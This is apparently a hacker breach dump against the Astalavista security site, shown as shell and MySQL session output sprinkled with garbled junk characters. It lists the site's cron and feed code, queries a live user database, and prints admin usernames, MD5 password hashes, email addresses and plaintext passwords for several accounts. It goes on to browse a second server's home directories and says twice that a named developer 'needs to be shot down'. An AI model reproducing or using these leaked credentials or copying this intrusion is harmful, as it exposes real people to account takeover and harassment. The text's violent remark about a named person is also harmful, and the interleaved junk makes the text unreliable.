<link>http://www.astalavista.com/exploits</link>6 }- F6 T! z0 t
<description>All availably Exploits.</description>
* K8 H" ]+ S2 ? j <language>en-us</language>8 J# F3 v1 {8 r
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
3 L. s* a# c$ V- P1 ] <docs>http://blogs.law.harvard.edu/tech/rss</docs>6 D$ x: ]2 v) P. j1 n
<generator>Astalavista.com</generator>
1 }. ?1 M1 u9 m- w; x% S <webMaster>info@astalavista.com</webMaster>’ . $items . ‘8 g* H4 v1 z+ R' b
</channel>1 a: W8 g6 B( D5 Q
</rss>’;
3 L ?4 a! K) h0 y1 Q; b3 a T: _( ]
( T% }( W; z$ H8 K$ ^& D5 ? if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {1 [9 h- g& e: X1 t! g# i. ~+ i
unlink (FULLPATH . ‘/feed/exploits.xml’);
$ p9 b" }" G: e7 m }1 j- b' `7 \# m, y, i" `, h3 C, `
I; l1 \! J+ V; ]* {2 v! N file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
- A5 w9 A& U$ Y[snip]
6 W6 v# Y5 _7 G! a+ s+ Z* [& c% D
3 `: }2 \% o- ?) b5 I6 F6 Bsh-3.2$ cat exploits.sh. M0 X+ }1 j/ Y6 R9 E
#!/bin/sh
9 w0 H# z8 e" M5 M6 C3 K7 z, T; J* d2 e# J5 u$ G
###########################################################
$ H& R3 H s# Z& T* f4 S& d( P# #% z+ h j" N) i, f; ~; |& \- ~
# Title: milw0rm exploits adder #% |* K g5 E9 O" x
# Description: Add all milw0rm exploits to the #- M& m9 F% @% ^1 B/ L6 z: u
# Astalavista.com database #5 A3 h% ^) t4 G9 H$ m8 {
# #/ Q4 m* [4 _, X5 n, g- ~0 g5 M2 k8 n' T
# Company: Astalavista Group #9 B F* c2 E- ^7 ~! w: U
# Author: Paulo M. Santos #
0 k: n( q" z- J9 q" Z' v# E-Mail: 链接标记paulo.santos@astalavista.ch #
3 K, Q+ D0 U" k+ t7 a" u4 z# #
6 T. j9 v* _7 Y& I###########################################################5 ]6 r+ a) G* N
, Q9 e+ Q h8 H) V# path/ ]8 @% B, H; R( `. X8 r: A5 t
this_path=/home/com/public_html/modifications/cronjobs; l2 H6 @) p; E+ S3 v' J: k9 j2 r
( a2 F5 r; b* F0 W$ B6 Y8 u) m
# change directory4 o1 c p- j& s* `$ m
cd $this_path0 R# J' X4 Z7 G' R
cd tmp/, J7 M5 G& n1 v9 ^4 m! I, r) P
; |; y4 Y) g4 L6 e, Q2 R5 B b
# delete files& t# j; G- _' [, D$ y( b
rm -rf milw0rm.tar.* &
- ~% _$ S2 s6 o4 O# c; drm -rf milw0rm/ &
6 l$ W6 R# _' k+ p4 k }+ w
# O9 S: Z8 |! O# A# wget milw0rm paket
# ~# A+ C' \- S/ e0 p7 Owget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
% }3 ?) E9 w( n6 n1 E# O6 U/ M
- n. }/ X1 L" y* E* E8 k7 J( Y- a# extract milw0rm paket/ ]- p- }! c: k7 [! M$ F! i
tar -xvf milw0rm.tar.bz2
6 q7 n! A7 k, e1 g& D+ s$ k- D/ i8 H) h, I D0 I. f4 f: Q+ t
# change owner
9 A: {: _6 O5 n$ cchown -R com .
8 r' b) g/ z% L* ochgrp -R com .3 Z6 ^9 m* S4 G' B! D, R
# E1 ~9 y- U) O$ W* G9 F0 D
# execute php script+ U8 i) S# i9 _1 @% x# e
cd $this_path
4 S* T/ r, W( Yphp -q exploits.php
; R, N8 ]" E2 {3 b; v: v- j2 o3 r/ q; b3 _: _1 P3 j& o1 R* F8 w
# delete files/ d: a# {- F- M
rm -rf tmp/milw0rm.tar.*
. Z% |: k- w1 \( I) s* ^3 H+ Nrm -rf tmp/milw0rm/
7 h8 {) B5 ]9 r% D
# Y" V+ c& J" A0 i( Esh-3.2$ echo “Paulo M. Santos needs to be shot down.”
, e, C% U% J$ Q: TPaulo M. Santos needs to be shot down.7 F( M' m9 e \) u3 w, Q0 g
. a+ Z( w8 ]& x* D8 f! l( v' Q
mysql -u contrexxuser2 -p
) c) c W" v5 J1 Y% v$ t6 Z2 TEnter password:$ _' @' i3 j" O
Welcome to the MySQL monitor. Commands end with ; or \g.2 }, d; P2 z, ~: ]2 T1 X
Your MySQL connection id is 261694+ q& t! H6 }! r1 c# Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)# E8 x5 }5 N5 q( h4 ^- w
8 L: p- a- r! x6 V- ?4 q+ f$ n
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.+ N$ u0 j: N& S' p! h' t
2 [( i6 {( S- L [. e
mysql> show databases;- |& ^$ v( w$ w. ^
+——————–+( {3 Y6 e1 h! e0 I
| Database |
/ L! Q4 T- ?5 Y) z+——————–+
' Q9 d: Y7 q; o. I* n& ?| information_schema |3 U& Q- i' Q( u
| com_contrexx2 |
+ }- r$ ^6 h# c: x| com_contrexx2_live |
7 U* A. u' N3 Y" l. J8 R| test |* P8 h) N) M6 h9 @( n: O+ p& l8 S& y# Z
+——————–+( i* q% l2 G: |' o8 S
4 rows in set (0.00 sec)
# m8 D" u& u- y% x: H, V0 d$ E& U- r
mysql> use com_contrexx2_live
% J. b Y7 y8 MDatabase changed
6 g8 P8 E+ A H5 j6 @mysql> show tables;0 r( {3 b5 N0 g* k' M, G! r) G
+————————————————–+
: J2 }/ p0 U5 V| Tables_in_com_contrexx2_live |
; \, d5 ^1 |9 r; T6 m1 V+————————————————–+7 D* b! }& J4 [# E! g
| cc_banner_counter |
2 @# q* h6 \5 {2 q. K* A2 i| cc_search_counter |
2 _9 l8 D- \8 ~( ^| contrexx_access_group_dynamic_ids |+ c# g. I. m, k B1 G0 X X
| contrexx_access_group_static_ids |
: O* a+ @3 [' S| contrexx_access_rel_user_group |; [/ B9 p. v0 X. Q. i
| contrexx_access_settings |' g) ^( h3 v. H# e/ W! O$ b0 R; r# E
| contrexx_access_user_attribute |. {- T5 A$ r0 z, A& g. g) ]0 D
| contrexx_access_user_attribute_name |! ~3 E/ k' n* P$ R- G9 A6 x
| contrexx_access_user_attribute_value |
; n% Z1 k7 L$ I3 K, z/ s: W| contrexx_access_user_core_attribute |: z" }, y! e4 z% q1 p/ {# A. Y! ?5 x7 G
| contrexx_access_user_groups |
0 H5 K5 n5 @& Q" y7 n| contrexx_access_user_mail |" A/ a4 g& c* m3 M! t8 L8 u
| contrexx_access_user_profile |
( s; Z) \# @0 H# s2 S| contrexx_access_user_title |4 H/ O1 T7 V% O6 [6 p
| contrexx_access_user_validity |
V9 e j) } q, L' `/ ^) D| contrexx_access_users |3 g5 B0 N9 e: j9 ]" b- E- H# N
| contrexx_backend_areas |! U7 [% F4 S; L$ f) H9 R! p
| contrexx_backups |
0 K8 q( |! x8 G! t| contrexx_content |
7 B: j- a" y {| contrexx_content_history |+ w+ Y/ V& a4 l- @
| contrexx_content_logfile |' i, Y% M- n2 c6 @4 [5 P2 h$ H" n
| contrexx_content_navigation |! [( D" }1 w U8 y% _
| contrexx_content_navigation_history |
" D0 {% N" N1 l: o$ H: c| contrexx_ids |4 F( d6 e7 B% g" b. _" g' `5 j
| contrexx_languages |0 J$ T4 l# ]6 c
| contrexx_lib_country |
* m2 j5 J! n7 G6 J1 _8 || contrexx_log |: P1 t* l# ~+ O& c
| contrexx_module_alias_source |4 ~. o6 V0 B8 b) }! ~' U
| contrexx_module_alias_target |2 e6 k1 `5 Y2 o2 A2 q5 h4 W
| contrexx_module_block_blocks |
6 I6 ^# G8 V+ @% G+ m| contrexx_module_block_rel_lang |
- X! g E( c9 P$ E3 e- c| contrexx_module_block_rel_pages |
I- O, E" v4 K5 ?" ^# o| contrexx_module_block_settings |
/ {+ \$ @+ l2 M( v( ]6 a4 t| contrexx_module_blog_categories |
9 y2 u" m8 i: ^ v/ N9 R| contrexx_module_blog_comments |7 y7 g8 L6 \6 T1 f
| contrexx_module_blog_message_to_category |
; O- P( `/ R% P$ |& N, d, \| contrexx_module_blog_messages |
$ V' e0 }% \" m& w| contrexx_module_blog_messages_lang |
. d: J$ `9 U# ^. V| contrexx_module_blog_networks |& n; b- j$ P& X: g9 Q1 J) t
| contrexx_module_blog_networks_lang |8 X/ F4 L& y0 \: l* U0 y% o' y; c/ g
| contrexx_module_blog_settings |
9 ^3 O8 |% w8 k; @. c1 M% W/ g5 t| contrexx_module_blog_votes |0 F0 e2 P4 }; ]/ q# L d$ p& z
| contrexx_module_calendar |
( z) i; A* O& }| contrexx_module_calendar_access |$ o$ T" [5 D2 L9 A5 C
| contrexx_module_calendar_categories |' n4 B& B9 [' B/ ^7 d' I
| contrexx_module_calendar_form_data |( e5 H! j) M* u. k. P
| contrexx_module_calendar_form_fields |" F$ U! V( Q; S! p: \" b
| contrexx_module_calendar_registrations |
* ]2 j; H& P I4 j U. D, Y| contrexx_module_calendar_settings |
2 e7 c W; k6 |" a3 \; _* X| contrexx_module_calendar_style |% t: a# c/ r* x/ U, X
| contrexx_module_contact_form |
" P( l1 x! y2 _, K. R% E* U| contrexx_module_contact_form_data |
1 |6 R( m F, d% r: f| contrexx_module_contact_form_field |+ K3 _+ h9 x. y R
| contrexx_module_contact_settings |* n( x' l* G2 T
| contrexx_module_data_categories |' H5 [# [0 D; x9 K, U6 x# W$ L
| contrexx_module_data_message_to_category |; E- d" q- h# K7 t* e
| contrexx_module_data_messages |
! o4 h5 t" O# D) ?| contrexx_module_data_messages_lang |
0 _0 N8 Z E- P9 s& P| contrexx_module_data_placeholders |5 h; o4 r2 ^9 ~. W( }( ^/ ]
| contrexx_module_data_settings |# y: { y U! ^0 o* w$ M+ d2 t
| contrexx_module_directory_access |
A" ^. x0 N) M# n: I( d/ r* b8 f| contrexx_module_directory_categories |
8 }6 g$ }. U$ B$ M$ ?/ W7 W0 s| contrexx_module_directory_dir |
& {: l% d- Z: D. I6 A| contrexx_module_directory_inputfields |& O- n' B! `" O
| contrexx_module_directory_levels |4 [, m$ \, w. W# L
| contrexx_module_directory_mail |
) I2 ^, F6 p8 p& F% s4 {3 Y6 p6 r| contrexx_module_directory_rel_dir_cat |
' R6 N6 f6 t) H7 f| contrexx_module_directory_rel_dir_level |
4 p- x9 I/ V* Q& r" r$ H0 S5 [| contrexx_module_directory_settings |: z2 G6 z/ R. A! H* J
| contrexx_module_directory_settings_google |( b, k* y4 J( p" ~
| contrexx_module_directory_vote |# K Q Y4 f! {5 b- F( z* W7 p; F, `
| contrexx_module_docsys |: D0 x4 J9 E+ o% {- c
| contrexx_module_docsys_categories |3 s+ T- g' F/ Q6 O& D( D, }
| contrexx_module_egov_configuration |
5 j6 k+ f0 [/ S+ v| contrexx_module_egov_orders |# R5 d. R; A: t1 y% t' x& r, q! S
| contrexx_module_egov_product_calendar |
$ k+ ^! |$ d2 f; k- G _5 c| contrexx_module_egov_product_fields |" P4 U$ @+ {) |- {
| contrexx_module_egov_products |
B- h- M- N% M* K, _" Q& M/ a. @| contrexx_module_egov_settings |( [$ g8 Z1 L# M5 f1 C7 B
| contrexx_module_exploits |
) ^% q( Y- B3 k+ C7 ?' x| contrexx_module_exploits_categories |0 \$ s* x7 B5 c$ y( d6 e
| contrexx_module_feed_category |% d2 r# }( d- _+ H$ M! W
| contrexx_module_feed_news |
6 T6 W: Q& X4 n/ ~( B| contrexx_module_feed_newsml_association |
2 M" x! R! X* e6 A3 F* c| contrexx_module_feed_newsml_categories |
, x) g& | J' C2 S| contrexx_module_feed_newsml_documents |/ p- [1 X' ^$ w# o, q
| contrexx_module_feed_newsml_providers |- z- V/ I: ^5 v( r9 h/ y4 w
| contrexx_module_forum_access |
3 e% c$ q8 z3 ?| contrexx_module_forum_categories |
9 z, Q* J) |7 J| contrexx_module_forum_categories_lang |
. `, ]" Y* m/ _' S) ^2 q| contrexx_module_forum_notification |' d% r$ H$ u# x% T, M
| contrexx_module_forum_postings |
& m+ |! u) p1 I2 `) X. ]| contrexx_module_forum_rating |
* J. W- a4 g, _# r| contrexx_module_forum_settings |
& ?0 Q( y W8 Q6 ^( ]| contrexx_module_forum_statistics |. ?# v! O4 R! U7 s& i- O
| contrexx_module_gallery_categories |0 R( e2 s( R6 f' Y& g' {$ [
| contrexx_module_gallery_comments |7 K$ q0 s, A7 x' B. C
| contrexx_module_gallery_language |
2 @2 }9 j4 R8 K& c \9 ?2 y! U0 l| contrexx_module_gallery_language_pics |% H6 G- H: j2 d
| contrexx_module_gallery_pictures |- V5 ^* ~/ d! \. Z2 L) h0 ^6 U! S! x
| contrexx_module_gallery_settings |+ k( V) X+ z4 F3 S
| contrexx_module_gallery_votes |
1 ^) s3 w$ ~& \| contrexx_module_guestbook |
& a2 b2 B+ I- t; A, A| contrexx_module_guestbook_settings |
- n& o. p- g, @" o| contrexx_module_livecam |
" m, F& t) X" O* A0 O| contrexx_module_livecam_settings |
5 V! U/ M7 i: E! r, J5 I| contrexx_module_market |7 c- m4 x; [0 N" U2 n* @# [
| contrexx_module_market_access |
3 e3 y/ j+ e; B0 R0 N+ I1 w| contrexx_module_market_categories |3 o6 L5 K1 Z7 q% R2 q
| contrexx_module_market_mail |
8 {1 B6 r |6 H+ @3 c' [( R| contrexx_module_market_paypal |
( f- g/ Q( @1 s& s* ^7 p3 q| contrexx_module_market_settings |
. R8 P, r" J2 c| contrexx_module_market_spez_fields |" C7 |% \# v% z4 X2 H, X i' u
| contrexx_module_mediadir_access |
. y+ D L: n$ i4 n3 A| contrexx_module_mediadir_categories |- v" u8 C5 w; e$ Y7 ]" H( }9 Z
| contrexx_module_mediadir_comments |
4 f! {1 K9 z8 I* E' R1 |! `, d| contrexx_module_mediadir_dir |$ P5 F. ^- v e- ^
| contrexx_module_mediadir_inputfields |. E) @2 W! o0 W* e
| contrexx_module_mediadir_levels |
. ]/ {* X: P$ H+ E6 _# \- B& ^ H| contrexx_module_mediadir_mail |3 P- Q) h: g- A$ U- @0 z9 R
| contrexx_module_mediadir_rel_dir_cat |
, ?6 W& H8 d* ~) o8 m| contrexx_module_mediadir_rel_dir_level |+ h, A+ M J5 \/ l* j T) _
| contrexx_module_mediadir_reports |* o0 O! g$ f/ G& `
| contrexx_module_mediadir_settings |" @& ^4 Q# s' Y0 y! p' s- [. Y! I, r
| contrexx_module_mediadir_settings_google |
4 Z! x) c. ~* u| contrexx_module_mediadir_vote |
1 S6 S: m+ h) l0 _ N! Z0 f# A| contrexx_module_memberdir_directories |2 |7 k$ N% k" I/ o" V2 u8 s$ p3 d
| contrexx_module_memberdir_name |1 `% x& \ z- Y1 k% b: A C ~
| contrexx_module_memberdir_settings |! X' L3 J7 P: w7 ?8 y
| contrexx_module_memberdir_values |) ]) \ {' k1 b8 B3 k2 ?5 R7 g9 x
| contrexx_module_nettools_allowed_groups |
. p/ u; w. a# \- S| contrexx_module_nettools_settings |2 C# M8 s+ i& \. K) d+ j
| contrexx_module_news |
; P# a* n4 R$ t9 X0 a% K+ ]" {* || contrexx_module_news_access |
1 Z3 m6 ~6 G( \2 D, e2 W5 e# {& [| contrexx_module_news_categories |& W4 J+ I' a5 d
| contrexx_module_news_settings |
) n7 S5 K/ [: o6 F5 Q( z| contrexx_module_news_teaser_frame |# u& V) i- x# i7 ~& g& o
| contrexx_module_news_teaser_frame_templates |/ p5 g( r3 l0 p( R
| contrexx_module_news_ticker |/ ~2 ~ Z* Z) O$ p4 m
| contrexx_module_newsletter |+ ?/ j6 T+ ]* S7 ~, @
| contrexx_module_newsletter_attachment |
' i# T2 a. o I& z% Z. g, U| contrexx_module_newsletter_category |
3 y6 w9 v& |7 F8 _| contrexx_module_newsletter_confirm_mail |" X" h4 W' l5 m7 ^
| contrexx_module_newsletter_rel_cat_news |
& m7 y. w* `$ p- H( d1 D| contrexx_module_newsletter_rel_user_cat |* n8 V. n8 z$ ~" H) N! g" B! u8 e0 _
| contrexx_module_newsletter_settings |/ D2 f( T( `# V1 ^
| contrexx_module_newsletter_template |
- h' C [7 L4 ]3 ]* V) b, m6 B| contrexx_module_newsletter_tmp_sending |
% x0 I/ j6 ?: L% i| contrexx_module_newsletter_user |- C5 k& c6 e9 p( j& E
| contrexx_module_newsletter_user_title |6 K- N: [3 l: k7 h* @' r: s, o' H
| contrexx_module_onlinetools_defaultports |# C+ s6 R! q/ v/ m5 O& [
| contrexx_module_onlinetools_defaultports_back | J% }. a% I( K
| contrexx_module_onlinetools_geolitecity_blocks |
8 \1 w0 @4 n/ `+ N6 g| contrexx_module_onlinetools_geolitecity_country |
. w* y. Z* f; p0 f| contrexx_module_onlinetools_geolitecity_location |
# b1 h6 n& \% t| contrexx_module_podcast_category |$ b7 J0 `9 P4 d' f
| contrexx_module_podcast_medium |: k6 \/ R! C$ S! t
| contrexx_module_podcast_rel_category_lang |3 a- i% V5 f4 q# U! ?
| contrexx_module_podcast_rel_medium_category |
9 h3 ?" `- y- F4 D: h: z| contrexx_module_podcast_settings |
) T7 r. C$ p9 m, i; F+ r o| contrexx_module_podcast_template |
1 s7 u' ~4 s6 K5 F9 W| contrexx_module_proxydb |$ _, w0 z1 G& M- p+ M' L
| contrexx_module_recommend |
2 i$ \0 k$ `- ^ z0 G% ^1 e4 K6 I| contrexx_module_repository |
% i: i2 Y% S8 `$ O x# d: {| contrexx_module_securitynews_cats |" C6 x8 N# U" b- S3 e
| contrexx_module_securitynews_feeds |9 F. B# h3 H! o+ M2 j( f' ]
| contrexx_module_securitynews_news |
' a4 t' k) k2 W) z| contrexx_module_shop_categories |, G# M) J7 l5 Z
| contrexx_module_shop_config |
7 R1 ]! P4 N# ~| contrexx_module_shop_countries |
$ Z% Z; d( ~0 |/ _| contrexx_module_shop_currencies |
1 h: P/ T6 c" H4 b0 O m| contrexx_module_shop_customers |0 y& A6 M8 P- }# Q7 |2 M& c) E
| contrexx_module_shop_importimg |8 X+ e3 p" v7 {0 e7 K
| contrexx_module_shop_lsv |
# V* I8 }% R# z4 f% |: |, F| contrexx_module_shop_mail |
* G. S& n. [0 e# c| contrexx_module_shop_mail_content |
6 T( ?2 U' h6 p/ R. C) N" R| contrexx_module_shop_manufacturer |6 U# T) z% n% y& N& j ?; K
| contrexx_module_shop_order_items |
6 W& C5 X- N# q% t7 v| contrexx_module_shop_order_items_attributes |: c# I1 `: C5 d" M
| contrexx_module_shop_orders |
9 P" t; R6 X/ f% F; B+ m4 e+ j| contrexx_module_shop_payment |' w! X9 J8 [3 n7 |9 P
| contrexx_module_shop_payment_processors |) M+ F J( _3 [, V, T: b
| contrexx_module_shop_pricelists |
7 A# c6 A' m3 {| contrexx_module_shop_products |
* |0 U; T: I3 Z4 J3 r7 `* L| contrexx_module_shop_products_attributes |
( i% V' Y& Z7 Q& {; }+ [1 R' b# J& L, e4 p| contrexx_module_shop_products_attributes_name |5 N J7 @4 Y# S
| contrexx_module_shop_products_attributes_value |
; n& }! T+ U* \5 O4 s| contrexx_module_shop_products_downloads |
7 j# m" S& g+ r/ E3 ^# K5 B* ]# X| contrexx_module_shop_rel_countries |! x/ I0 w L4 r+ P+ {5 Z1 |
| contrexx_module_shop_rel_payment |
0 C2 Z. E7 l* \& t. ^- q W; i% P| contrexx_module_shop_rel_shipment |: m+ [ o$ S1 Z& b/ X n% y
| contrexx_module_shop_shipment_cost |
: | g8 ]$ e$ h! U9 n2 u( j( ~$ L| contrexx_module_shop_shipper |9 i9 z3 t) I- u1 o: M& j n0 a w
| contrexx_module_shop_vat |2 m9 @5 _, k9 E" V( h. o
| contrexx_module_shop_zones |
/ F4 A5 s6 A& u( l! e; H| contrexx_module_u2u_address_list |5 A; L3 k) v, L, T- y; m7 _- b
| contrexx_module_u2u_message_log |, ~3 S' C) |- S1 p a
| contrexx_module_u2u_sent_messages |- E3 f. Z; A: y4 Z" e- N) J
| contrexx_module_u2u_settings |
% e) n; u& N7 X: h' D| contrexx_module_u2u_user_log |& t9 f) _5 M% @9 i
| contrexx_modules |
8 y3 _# Y5 @1 Q0 n; K| contrexx_sessions |
5 M; L1 e" Z8 l3 u! E& h" B- N e| contrexx_settings |
4 v! |9 t& x% R3 B! Z, @( ]) h| contrexx_settings_smtp |
; q; U8 o, U X0 ?) w! j8 j# j| contrexx_skins |
+ q z$ h m4 V1 }| contrexx_stats_browser |* c0 Q% v3 V. o
| contrexx_stats_colourdepth |2 C) w% K9 r) w0 x
| contrexx_stats_config |
0 H; I5 t8 v& u) U| contrexx_stats_country |
, A7 Q5 U1 n( ]4 X6 N| contrexx_stats_hostname |
6 E$ b6 p- e' u8 H| contrexx_stats_javascript |1 o( c. j# g+ ^: Y7 S/ ?
| contrexx_stats_operatingsystem |
3 j; _( P4 {1 U. ~6 o/ f| contrexx_stats_referer |
/ L: h4 b% b' _% w1 _| contrexx_stats_requests |
, |. B5 K( K! N/ i' G| contrexx_stats_requests_summary |) v" A2 B6 Z/ n
| contrexx_stats_screenresolution |
8 c) g! m" F3 P/ _; e| contrexx_stats_search |
' n1 @) X% L; Z9 d# P4 n$ n6 U% }| contrexx_stats_spiders |( o9 [+ e% L* j7 o7 f( b# V8 T& {
| contrexx_stats_spiders_summary |' g4 k z. h9 |% N
| contrexx_stats_visitors |
% e- U" M, s2 I| contrexx_stats_visitors_summary |0 b9 W# s! L- M, K7 P% ~
| contrexx_voting_additionaldata |
* j4 b- e$ e# ~! l. O: w( R' P| contrexx_voting_email |
& p9 _( s, w5 u; \% ?6 e| contrexx_voting_rel_email_system |
1 y3 a( X# W" M* E% L| contrexx_voting_results |
' Z7 j& J8 f- S& J, h, ^| contrexx_voting_system |
: {+ a0 E1 A" k x4 L! z' || foo |
! L) H' x% F4 s: V) d- _* P! i1 G+————————————————–+# {- E: \1 l8 v. I* Q
227 rows in set (0.01 sec)! i" l8 M. A- p. f4 A5 }& I
2 m3 d/ W' l2 p# Q) L; M
mysql> select count(*) as skids from contrexx_access_users;/ d O c, ~1 W) s, {# i/ M: v
+——-+- ]1 C: v+ p6 t
| skids |
1 `" Z+ O; ]0 m" ?" e3 B+——-+3 \9 f( D5 V0 v4 X7 H; u5 Z9 D1 e
| 53699 |
0 z; v2 _4 F: y$ l2 w( _+——-+
2 X2 Z3 q* ]. f6 u1 row in set (0.00 sec)
! n4 _9 i4 r+ _% |; f8 O1 ~3 k
2 I( c/ P! s8 i6 }7 J# ?mysql> describe contrexx_access_users;
7 t1 F2 U6 [8 x+——————+——————————————+——+—–+————–+—————-+5 l; Q+ @# l* x5 F
| Field | Type | Null | Key | Default | Extra |0 n4 w* {* A% V6 h
+——————+——————————————+——+—–+————–+—————-+) n8 O W; k2 k+ k' M
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |- Q, Q4 e* e( p7 c/ H
| is_admin | tinyint(1) unsigned | NO | | 0 | |
. m% n" Z* I/ Q1 M& k| username | varchar(40) | YES | MUL | NULL | |' ]3 A. s! G0 I+ R$ L
| password | varchar(32) | YES | | NULL | |& P8 l, @7 r$ g' m! _2 N# _! L4 e0 \4 V
| regdate | int(14) unsigned | NO | | 0 | |
: z4 @% v% F4 E! r! i| expiration | int(14) unsigned | NO | | 0 | |) t/ _3 H- h' {- |4 A3 M
| validity | int(10) unsigned | NO | | 0 | |
* Y% v9 K) i0 Z! ?/ w% {| last_auth | int(14) unsigned | NO | | 0 | |
4 m% j" I8 }0 q- c- d" e3 O1 l| last_activity | int(14) unsigned | NO | | 0 | |
/ C6 l& k4 M. [6 y! N% @, y! X: || email | varchar(255) | YES | | NULL | |5 r* u1 E8 ^# W2 r/ }
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
! f$ u+ D$ S9 S3 n. W; e| frontend_lang_id | int(2) unsigned | NO | | 0 | |& l* Y0 I& Q" w) Q% M1 c/ i- V7 A
| backend_lang_id | int(2) unsigned | NO | | 0 | |
; j4 h% n4 a* P5 Z7 ?5 I' z, z| active | tinyint(1) | NO | | 0 | |
( | B) p& `8 n+ P8 E" c0 F| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |6 \" M( h2 b1 i3 d6 t' K
| restore_key | varchar(32) | NO | | | |. P# t3 h& _: ]9 O7 j+ t
| restore_key_time | int(14) unsigned | NO | | 0 | |7 e+ W! a) j+ M& c, {
| u2u_active | enum(’0′,’1′) | NO | | 1 | |
4 ~, V: o& S" y3 `" U4 z( d+——————+——————————————+——+—–+————–+—————-+
5 Y) W. N. v9 {. F1 j18 rows in set (0.00 sec)
. L$ @# {- k/ f7 M
: {9 k5 f% K/ R$ [( d. qmysql> select username,password,email from contrexx_access_users where is_admin = 1;
# j0 K" g3 H! l3 c" W+————+———————————-+—————————–+; g9 v$ L' U, C; ?; n
| username | password | email |
' F; _- R# w2 c. r0 }* \+————+———————————-+—————————–+
3 N# l) E- U: r5 x' i6 q| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |- R8 D" r% l1 d! E% p
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |* O, U; d+ j D
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |; `$ j: [! V- ?) W* E# o+ P
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
2 C* [# w; }* a- x3 ]2 s6 V% d+————+———————————-+—————————–+4 |3 K& c3 O! p: H, ]6 M
4 rows in set (0.04 sec)* a& F: C: I' H* T3 F; Y
7 B2 Z# {6 _! {3 h. O8 Dmysql> exit;
4 U7 ^/ u; m' _. vBye
: l5 o+ M0 V3 p& ]& v1 t( b( `7 _ Y3 ^0 B
[~] There you go, your “team of security and IT professionals” is a joke.& g) B- N' F+ ~
* w3 U& l- Y+ {& h/ E/ E H
+——————————+; E9 V- {6 ]( {
system:f82BN3+_*
- y3 R7 M: p: f9 X* _' GBe1er0ph0r:belerophor4astacom
* k% | X5 m0 [0 u3 z K- `- T8 Sprozac:asta4cms!) R m! o& t9 B _" B
commander:mpbdaagf6m
( e3 D3 `: `5 |# W6 L2 H1 R, Dsykadul:ak29eral/ c$ y/ ^8 @" n' B
+——————————+3 |7 }: y: i+ o8 a+ [' q5 o+ F' K
7 m) q, X! x. y
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
' ~+ S$ ~1 B5 j3 _# G3 G0 f u…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
% @ D$ K b0 M' y. C! B& J6 E0 G, n6 [: L
[~] Lets move to astalavista.net now,) \6 z) _4 C- _8 r/ ~
( s( Q# c/ D6 b1 B2 N2 N# [8 _From <链接标记[url]https://www.astalavista.net/[/url]>:* N" h. c/ e* X2 A
>> Everyone knows that the best defense is a good offense.8 r9 E a* W! c: M* ?% }; B0 Y
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy./ {; u }% k' a7 l9 ^. ]. W5 F {/ @. S8 f
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
$ F) i0 _. `8 ^>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”
6 x" s U. [1 j! R/ o! e1 X4 D
9 z6 C0 B3 o5 B>> Go ahead, try and hack our server . in a completely legal way!
2 m2 f1 d# O9 ?! A, e>> Learn by doing: We offer our members tricky tasks and challenges on an% J- Q/ A) D4 g4 `; D' t7 |
>> ongoing basis so you can test your knowledge and abilities. You can also, l7 g/ ~! Y+ ^8 w! f! u
>> demonstrate what you.ve mastered by taking part in regular hacker contests
$ y% c) b0 r. i a- ^5 b4 x>> and war games z' b6 t; T1 ^1 w# ~6 T
9 a: {4 Y! x4 y
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!. d# p9 x. \8 W9 X8 f' y2 {! x2 u2 L
5 z- g9 v$ F- d
[-] Tricky task: Find home dir of astalavista.net; [$ {* G/ o% E) G1 M H2 S! I
: @( Z4 h" K' f+ _sh-3.2$ ls -la ~astanet
p/ O6 A* [5 s9 i4 x% Dtotal 486 }6 I: H, W6 A$ k" F
drwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
~* r3 M$ b' u' S8 {8 L/ odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 ?: L# h' x7 a0 d$ x; b. d/ A+ Ddrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
0 j% x; a- ?4 a4 _, D-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history# e, O& i$ q) r2 T9 U" I1 A! [
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout N) V9 C' n2 n, A1 |* E# Y; T
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
8 v: b4 v5 `+ ~! q5 W+ ]1 P5 f6 F-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc/ F* ]4 X0 L( W8 Y: ]
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains. x4 Q8 j, ?+ W0 A& W8 i. Z
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap1 ?& {' E# n V
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
( n4 _( X! Z2 ?% ~lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
; [* O3 K7 ^* g-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& c+ H3 D; s& {
9 n% o j. b) s) \sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
. b9 _/ V7 [$ ]sh-3.2$ ls -la
! \* F& I2 v0 F1 ~& `5 Dtotal 2007 v! S; |* _8 _, j8 T
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
. C! K) `) F" l" R. T7 Jdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
